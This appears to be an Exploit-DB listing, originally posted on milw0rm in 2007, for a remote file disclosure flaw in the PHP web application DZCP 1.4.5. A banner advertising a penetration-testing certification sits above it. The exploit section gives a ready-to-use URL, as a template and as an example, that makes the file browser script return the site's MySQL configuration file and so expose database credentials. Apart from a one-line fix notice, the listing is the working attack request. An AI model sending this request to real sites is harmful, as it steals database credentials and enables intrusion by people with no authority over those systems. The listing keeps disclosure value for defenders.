DZCP (deV!L`z Clanportal) 1.4.5 - Remote File Disclosure

EDB-ID:

3357


Author:

Kiba

Type:

webapps


Platform:

PHP

Date:

2007-02-21


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:

http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php

Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php

# milw0rm.com [2007-02-21]